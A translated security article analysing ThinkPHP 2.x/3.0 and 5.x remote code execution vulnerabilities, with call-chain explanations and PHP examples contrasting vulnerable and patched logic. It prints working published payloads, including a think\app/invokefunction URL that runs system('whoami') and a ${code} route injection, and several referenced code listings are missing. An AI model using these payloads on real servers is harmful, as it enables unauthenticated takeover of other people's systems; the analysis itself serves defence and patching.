Analysis and usage of ThinkPHP vulnerabilities

2025-03-13 Update From: SLTechnology News&Howtos

Shulou (Shulou.com) 06/01 Report

This article analyses the high-risk ThinkPHP vulnerabilities and how they are exploited. The content is quite detailed; readers interested in the topic may find it useful.

I. Component introduction

1.1 Basic information

ThinkPHP is a fast, compatible and simple lightweight PHP development framework from China, released under the Apache 2 open-source license. It uses an object-oriented structure and the MVC pattern, and combines ideas from Struts and TagLib (tag libraries) with the ORM mapping and ActiveRecord pattern of Ruby on Rails.

ThinkPHP runs on Windows, Unix and Linux servers. The official release requires PHP 5.0 or above and supports MySQL, PgSQL, SQLite and other databases, as well as the PDO extension.

1.2 Version overview

Over its history ThinkPHP has gone through several core series: ThinkPHP 2, ThinkPHP 3, ThinkPHP 5 and ThinkPHP 6. The series differ substantially in code structure and features. The ThinkPHP 2 and 3 series are no longer maintained; ThinkPHP 5 is currently the most widely used, and ThinkPHP 3 still has a large installed base of historical users. The version breakdown is shown in the following figure:

II. Overview of high-risk vulnerabilities

Collecting and collating the known ThinkPHP vulnerabilities and filtering for the high-risk ones gives the following list:

From the data in the table above, most of the ThinkPHP 3 vulnerabilities were disclosed in 2016 and 2017, while the ThinkPHP 5 vulnerabilities were mostly disclosed in 2017 and 2018. From 2020 onwards, vulnerabilities in the ThinkPHP 6 series have also been found.

Most of the high-risk ThinkPHP vulnerabilities of recent years lie in framework functions that an application only reaches through its own code, so they are better described as risky functions of the framework: they become exploitable only when secondary development calls them, and most of them lead to SQL injection. Developers building web applications on ThinkPHP must therefore be aware of these historical risk points and avoid the affected functions or versions wherever possible.

III. Vulnerability exploitation chains

3.1 Exposure mapping

Using the historical high-risk vulnerabilities of ThinkPHP, developers can map the attack risk points of each version and use that chart to steer clear of risky ThinkPHP versions, as shown in the ThinkPHP exposure mind map.

3.2 Summary of exploitation chains

From the exposure mind map we can extract several ThinkPHP framework vulnerability chains that are directly exploitable, with no secondary development code involved.

3.2.1 ThinkPHP 2.x/3.0 GetShell

ThinkPHP 2.x/3.0 GetShell

On these older ThinkPHP versions the vulnerability above can be used to execute arbitrary system commands and take over the server.

3.2.2 ThinkPHP 5.0 GetShell

ThinkPHP 5.0.x GetShell

First, identify which ThinkPHP series the target runs.

If the target is a 5.0.x release, ThinkPHP 5.x remote code execution vulnerability 1 can be used to execute arbitrary commands without authentication and obtain the highest privileges on the server.

3.2.3 ThinkPHP 5.1 GetShell

ThinkPHP 5.1.x GetShell

First, identify which ThinkPHP series the target runs.

If the target is a 5.1.x release, ThinkPHP 5.x remote code execution vulnerability 1 can be used to execute arbitrary commands without authentication and obtain the highest privileges on the server.

Using ThinkPHP 5.x remote code execution vulnerability 2 on 5.1.x additionally requires that the application suppresses PHP error output, i.e. that its PHP entry file contains the statement error_reporting(0);. Because this precondition must hold, the vulnerability is harder to exploit on the 5.1.x series.

IV. Analysis of the readily exploitable vulnerabilities

From the list of high-risk vulnerabilities, this section analyses in depth the ThinkPHP vulnerabilities that can be exploited without any secondary development.

4.1 ThinkPHP 2.x/3.0 remote code execution vulnerability

4.1.1 Vulnerability summary

Vulnerability name: ThinkPHP 2.x/3.0 remote code execution

Reference number: none

Threat level: high

Affected versions: ThinkPHP 2.x/3.0

Vulnerability type: remote code execution

Exploitation difficulty: easy

4.1.2 Vulnerability description

ThinkPHP is an open-source MVC framework created to simplify enterprise application development and agile web application development. In Dispatcher.class.php the URL parsing step calls preg_replace with the dangerous /e modifier on the route string, so the replacement string (the second argument of preg_replace) is executed as PHP code. An attacker can therefore craft a malicious URL and execute arbitrary PHP code.

4.1.3 Vulnerability analysis

The vulnerability lies in /ThinkPHP/Lib/Think/Util/Dispatcher.class.php, which in ThinkPHP 2.x matches routes with preg_replace in /e mode. It is well known that the /e mode of preg_replace, combined with PHP double-quoted string interpolation, leads to code execution; the trigger point is the preg_replace call at line 102 that parses the URL path. The code is as follows:

The block first checks the routing rules; if there are none, the URL is dispatched according to the default rules. In the preg_replace() call the regular expression carries the /e modifier, so the replacement string is evaluated as PHP code and the matched string is replaced with its result.

The regular expression can be simplified to (\w+)/([^/]+): it captures the segment before and the segment after each /. The replacement string $var['\1']="\2"; is an array operation that uses the first capture as the key of the new array and the second capture as its value. Since the second capture is under our control and is interpolated into a double-quoted string, we can execute arbitrary PHP code: PHP evaluates ${...} expressions inside double quotes, so placing ${code} in the ThinkPHP URL is enough to trigger the arbitrary code execution vulnerability. For example:

index.php?s=a/b/c/${code}

ThinkPHP supports two URL formats:

http://serverName/index.php/module/controller/action/[parameter name/parameter value...]

Servers that do not support PATHINFO can use the compatibility mode:

http://serverName/index.php?s=/module/controller/action/[parameter name/parameter value...]

So the payload can also take the form index.php/a/b/c/${code}.
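To make the mechanism concrete, here is an added example, written for this article rather than taken from ThinkPHP, that models the name/value parsing step of the 2.x dispatcher. The regex, the replacement string $var['\1']="\2";, the helper names and the / separator are this example's own reconstruction of the step described above, placed beside the safe form a maintainer would use today.

```php
<?php
// Added example (not ThinkPHP's own code): a reduced model of the 2.x
// Dispatcher's "name/value" path parsing, showing why the /e modifier
// turned route segments into executable code, and a safe replacement.
// Assumptions: the separator is '/', the vulnerable replacement string is
// $var['\1']="\2"; and only the variable-pair step is modelled.

// Vulnerable shape (PHP 5 only: the /e modifier was removed in PHP 7).
// The replacement string is eval'd once per match in this function's scope,
// and "\2" lands inside a double-quoted string, so a segment such as
// ${@phpinfo()} is evaluated rather than stored.
function parse_path_vars_vulnerable(string $path): array
{
    $var = [];
    if (PHP_MAJOR_VERSION >= 7) {
        throw new RuntimeException('/e modifier is unavailable on PHP >= 7');
    }
    preg_replace('@(\w+)/([^/]+)@e', '$var[\'\\1\']="\\2";', $path);
    return $var;
}

// Hardened shape: preg_replace_callback hands the captures to a closure as
// plain data. Nothing in $m[2] is evaluated; the value is stored verbatim.
function parse_path_vars_safe(string $path): array
{
    $var = [];
    preg_replace_callback(
        '@(\w+)/([^/]+)@',
        function (array $m) use (&$var): void {
            $var[$m[1]] = $m[2];
        },
        $path
    );
    return $var;
}

// Constructed inputs: a benign route and one carrying a ${...} expression
// in the position the payload above uses (index.php?s=a/b/c/${code}).
$benign  = 'id/42/page/3';
$hostile = 'a/b/c/${@phpinfo()}';

var_dump(parse_path_vars_safe($benign));   // ['id' => '42', 'page' => '3']
var_dump(parse_path_vars_safe($hostile));  // ['a' => 'b', 'c' => '${@phpinfo()}']
```

parse_path_vars_vulnerable() refuses to run on PHP 7 and later because the /e modifier no longer exists there; on PHP 5 the hostile input runs phpinfo() during route parsing, whereas parse_path_vars_safe() keeps the ${...} segment as an inert string. The fix is the one PHP itself adopted when it removed /e: move the per-match logic into a preg_replace_callback closure, where captures are data and never code.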

4.2 ThinkPHP 5.x remote code execution vulnerability 1

4.2.1 Vulnerability summary

Vulnerability name: ThinkPHP 5.0.x/5.1.x remote code execution vulnerability

Reference number: none

Threat level: critical

Affected versions: ThinkPHP v5.0.x < 5.0.23, ThinkPHP v5.1.x < 5.1.31

Vulnerability type: remote code execution

Exploitation difficulty: easy

4.2.2 Vulnerability description

On 10 December 2018 the ThinkPHP v5 series released a security update fixing a serious vulnerability that leads to remote code execution. The vulnerability is caused by a code issue in the ThinkPHP v5 framework itself; it affects a wide range of deployments and allows arbitrary code and commands to be executed remotely. Websites in e-commerce, financial services, online gaming and similar industries use the ThinkPHP framework heavily and need particular attention. Because ThinkPHP v5 does not check the controller name sufficiently, an attacker can, when forced routing is not enabled, construct a specific request that directly achieves remote code execution and thereby gain control of the server.

4.2.3 Vulnerability analysis

The ThinkPHP 5.0 security update mainly adds a restriction on the controller name in library/think/App.php, while the ThinkPHP 5.1 security update adds the corresponding restriction in library/think/route/dispatch/Module.php.

From the patch it is clear that the root cause is that the framework does not validate the controller name, so that when forced routing is not enabled a malicious external parameter can be introduced, resulting in remote code execution.

In ThinkPHP's architecture the controller is supplied externally through the route in the URL, i.e. /index.php?s=/module/controller/action/[parameter name/parameter value...]. The controller is therefore an attacker-controlled parameter that is processed by library/think/App.php. We trace the route handling logic to see the complete call chain of the vulnerability.

First, in the main run() function, the incoming URL goes through a route check, as shown in the following code:

Following self::routeCheck, line 620 calls $request->path(). This function lives in thinkphp/library/think/Request.php and in turn calls $this->pathinfo() in the same file, where the URL is parsed into the individual parts of the route.

var_pathinfo is a system default parameter whose default value is s. The value of var_pathinfo obtained from the GET request, i.e. /module/controller/action/[parameter name/parameter value...], is passed as the $path parameter to routeCheck() for route checking.

Back in the routeCheck() function:

After initialising the route-check configuration, Route::check is called. As the code shows, if no matching route is found, $result is false; if forced routing ($must) is enabled an exception is thrown; otherwise execution proceeds into Route::parseUrl to resolve $path. This is where our vulnerability trigger point begins:

parseUrl first parses the URL, then calls parseUrlPath, which splits the route address on / and returns the parts as an array:

Finally, back in parseUrl, module, controller and action are extracted from the returned $path, packed into $route and returned:

Returning to the run() function of thinkphp/library/think/App.php:

After routeCheck completes, execution enters the exec() function:

exec() first validates the routing information by calling module(), which checks whether the module named in the route exists and whether it is on the list of forbidden modules:

If the module exists, the controller and action names from the module are assigned to $instance and $action respectively, and both are finally stored in the $call parameter.

Finally, $call is passed to self::invokeMethod() for processing:

In this function the controller object (method[0]) and the action (method[1]) are resolved by reflection via ReflectionMethod, and the incoming parameters are obtained with $args = self::bindParams($reflect, $vars);. This completes the vulnerable call chain.

Let us summarise the final attack chain using the payload:

http://serverName/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

Following the analysis above, the route resolves to:

Module: index

Controller: think\app

Action: invokefunction

Through this chain the invokefunction method of the think\App class is reached via ReflectionMethod:

By constructing the parameters, arbitrary code can finally be executed.
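The following added example, written for this article and not taken from ThinkPHP, models why the unvalidated controller segment lets think\app name a framework class and what the controller-name check added by the 5.0.23 / 5.1.31 patches prevents. The namespace layout app\{module}\controller\{Controller}, the rule that a name containing a backslash is used as a fully qualified class name, the FrameworkApp stand-in, the class alias and the exact regex are this example's own assumptions; consult the actual patch for the expression ThinkPHP ships.

```php
<?php
// Added example (not ThinkPHP's own code): a reduced model of the 5.0.x
// dispatcher turning the "s=" path into module/controller/action, why an
// unvalidated controller segment lets "think\app" name a framework class,
// and the shape of the check the patches introduced.

namespace app\index\controller {
    // An ordinary application controller, the only kind a route should reach.
    class Index
    {
        public function hello(string $name = 'world'): string
        {
            return "hello {$name}";
        }
    }
}

namespace {
    // Stand-in for the framework class the payload reaches via think\app;
    // the real think\App::invokefunction($function, $vars) does the same job.
    class FrameworkApp
    {
        public function invokefunction(callable $function, array $vars = [])
        {
            return call_user_func_array($function, $vars);
        }
    }
    // Let the payload's literal class name resolve without ThinkPHP installed
    // (assumption of this example).
    class_alias(FrameworkApp::class, 'think\app');

    function split_path(string $s): array
    {
        return array_pad(explode('/', trim($s, '/'), 3), 3, null);
    }

    // Pre-patch behaviour: any string is accepted as the controller name and,
    // because it contains a backslash, it is treated as a fully qualified
    // class name instead of being prefixed with app\{module}\controller\.
    function resolve_controller_unchecked(string $module, string $controller): string
    {
        if (strpos($controller, '\\') !== false) {
            return $controller;
        }
        return 'app\\' . $module . '\\controller\\' . ucfirst($controller);
    }

    // Post-patch behaviour: reject anything that is not a plain identifier
    // before it can take part in class resolution.
    function resolve_controller_checked(string $module, string $controller): string
    {
        if (!preg_match('/^[A-Za-z](\w|\.)*$/', $controller)) {
            throw new InvalidArgumentException('controller not exists:' . $controller);
        }
        return 'app\\' . $module . '\\controller\\' . ucfirst($controller);
    }

    // A benign route resolves the same way before and after the patch.
    [$m, $c, $a] = split_path('index/index/hello');
    $class = resolve_controller_checked($m, $c);            // app\index\controller\Index
    echo "benign: ", (new $class())->$a(), "\n";            // hello world

    // Constructed request mirroring the published payload shape; strtoupper
    // stands in for system so the example is harmless to run.
    [$m, $c, $a] = split_path('index/think\app/invokefunction');
    $vars = ['function' => 'strtoupper', 'vars' => ['whoami']];

    $class = resolve_controller_unchecked($m, $c);          // think\app
    echo "unchecked: ", (new $class())->$a($vars['function'], $vars['vars']), "\n"; // WHOAMI

    try {
        resolve_controller_checked($m, $c);
    } catch (InvalidArgumentException $e) {
        echo "checked: ", $e->getMessage(), "\n";           // controller not exists:think\app
    }
}
```

The point the model makes is that the dispatcher never asks whether the resolved class is an application controller at all: once the controller segment can carry a backslash, the route selects any loadable class and any of its public methods, with the remaining query parameters bound to that method's arguments by reflection. Validating the segment as a bare identifier before resolution closes that path; enabling forced routing removes the default module/controller/action parsing altogether.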

4.3 ThinkPHP 5.x remote code execution vulnerability 2

4.3.1 Vulnerability summary

Vulnerability name: ThinkPHP 5.0.x/5.1.x remote code execution vulnerability

Reference number: none

Threat level: critical

Affected versions: ThinkPHP v5.0.x up to and including 5.0.23 (fixed in 5.0.24); ThinkPHP v5.1.x under the conditions described below

Vulnerability type: remote code execution

Exploitation difficulty: easy

4.3.2 Vulnerability description

On 11 January 2019 a security team published a write-up of a ThinkPHP 5.0.* remote code execution vulnerability. It is similar in principle to the ThinkPHP 5.0.* remote code execution vulnerability of December 2018; under certain conditions an attacker can use it to gain the highest privileges on the target server. Later research showed that, under certain conditions, ThinkPHP 5.1.x is also affected, and when those conditions are met an attacker can execute arbitrary code.

4.3.3 Vulnerability analysis

The key point of the vulnerability is in thinkphp/library/think/Request.php:

From the code: the method() function determines the request method. var_method is never validated; it is a controllable parameter passed in from outside. ThinkPHP supports configuring a "form spoofing variable", and var_method is exposed externally as the controllable parameter _method:

Because var_method is not filtered at all, we can control the value of the _method parameter to call any method of the Request class dynamically, and pass arguments to the called method by controlling the contents of $_POST. Since the vulnerability lies in the method() function, we need to find a call chain to that function in order to construct a PoC.

The first chain goes through the constructor __construct(), which looks like this:

The function iterates over the $options array and, whenever a key of $options is the name of a property of the class, assigns the corresponding value to that property. A request can therefore be constructed to overwrite property values of the Request class, for example the filter property, which holds the functions used for global input filtering.

In the analysis of the previous vulnerability we traced the route check self::routeCheck; during that process execution enters the check() function in thinkphp/library/think/Route.php, which calls method() and stores the lower-cased result in the $method variable. When the constructor is reached to overwrite variables, method can be overwritten directly, so the final value of $method in $method = strtolower($request->method()); is under our control.

In this function the method() function is called, and that is where the variable overwrite happens:

The request parameters are finally saved into the input property by the call to the constructor __construct().

After routeCheck, the first half of the call chain is complete and the variable overwrite has been achieved. The next step is to turn the overwritten variable into code execution. The call chain is as follows:

Return to run() in App.php, then into exec(), then module(), and finally invokeMethod():

From invokeMethod() into bindParams(), then into param():

and finally into input():

Finally, array_walk_recursive() leads into filterValue():

Here the attacker-controlled filter is invoked through the callback function call_user_func, and code execution is achieved. This completes the call chain.
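As an added example for this article, not ThinkPHP's own code, the block below models the two Request.php behaviours the chain above relies on: the property overwrite through _method=__construct and the filter property reaching call_user_func via input(), each beside a hardened version. The class bodies, the option whitelist, the verb list and the use of strtoupper in place of system are this example's own assumptions; the names _method, filter, method(), input() and filterValue() follow the text.

```php
<?php
// Added example (not ThinkPHP's own code): a reduced model of Request::method()
// and Request::__construct() as the chain above uses them, plus a hardened
// subclass. Option whitelist and verb list are this example's assumptions.

class VulnerableRequest
{
    protected $method;
    protected $filter = [];   // global filter callables applied by input()
    protected $post = [];

    // Pre-patch shape: any $options key that names a property overwrites
    // that property, so a request body can set $filter (and $method).
    public function __construct(array $options = [])
    {
        foreach ($options as $name => $value) {
            if (property_exists($this, $name)) {
                $this->$name = $value;
            }
        }
    }

    // Pre-patch shape: _method is turned into a method name and called
    // without validation, so _method=__construct re-runs the constructor
    // with the whole POST body as $options.
    public function method(array $post): string
    {
        $this->post = $post;
        if (isset($post['_method'])) {
            $this->method = strtoupper($post['_method']);
            $this->{$this->method}($post);
        }
        return $this->method ?? 'GET';
    }

    // Mirrors input() -> array_walk_recursive() -> filterValue(): every
    // configured filter is applied to every leaf value via call_user_func.
    public function input(array $data): array
    {
        $filters = (array) $this->filter;
        array_walk_recursive($data, function (&$value) use ($filters) {
            foreach ($filters as $f) {
                $value = call_user_func($f, $value);
            }
        });
        return $data;
    }
}

class HardenedRequest extends VulnerableRequest
{
    private const VERBS   = ['GET', 'POST', 'PUT', 'DELETE', 'PATCH'];
    private const OPTIONS = ['method'];   // the only property a caller may preset

    // Fix 1: the constructor accepts a fixed set of keys, so $filter can
    // never be set from request data.
    public function __construct(array $options = [])
    {
        parent::__construct(array_intersect_key($options, array_flip(self::OPTIONS)));
    }

    // Fix 2: _method may only select a real HTTP verb, and the verb is
    // stored rather than used as the name of a method to call.
    public function method(array $post): string
    {
        $this->post = $post;
        if (isset($post['_method'])) {
            $verb = strtoupper($post['_method']);
            if (!in_array($verb, self::VERBS, true)) {
                throw new InvalidArgumentException('unsupported _method: ' . $verb);
            }
            $this->method = $verb;
        }
        return $this->method ?? 'GET';
    }
}

// Constructed POST body following the published payload shape; strtoupper
// stands in for the system callable so the example is harmless to run.
$post = ['_method' => '__construct', 'filter' => ['strtoupper'], 'method' => 'get'];

$v = new VulnerableRequest();
$v->method($post);                          // re-enters __construct: filter = ['strtoupper']
print_r($v->input(['get' => ['whoami']]));  // get => [WHOAMI]: the injected "filter" ran on the input

$h = new HardenedRequest();
try {
    $h->method($post);
} catch (InvalidArgumentException $e) {
    echo $e->getMessage(), "\n";            // unsupported _method: __CONSTRUCT
}
print_r($h->input(['get' => ['whoami']]));  // get => [whoami]: nothing was installed
```

Two independent mistakes combine here, and both need fixing: a request-supplied string is used as a method name, and the constructor trusts arbitrary keys as property names. Removing either one breaks this particular chain, but only the whitelist on both the verb and the settable options leaves no route from request data to the filter callables that input() later hands to call_user_func.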

This concludes the analysis and exploitation of the ThinkPHP vulnerabilities. We hope the content above is useful to you; if you found the article helpful, please share it so more people can read it.
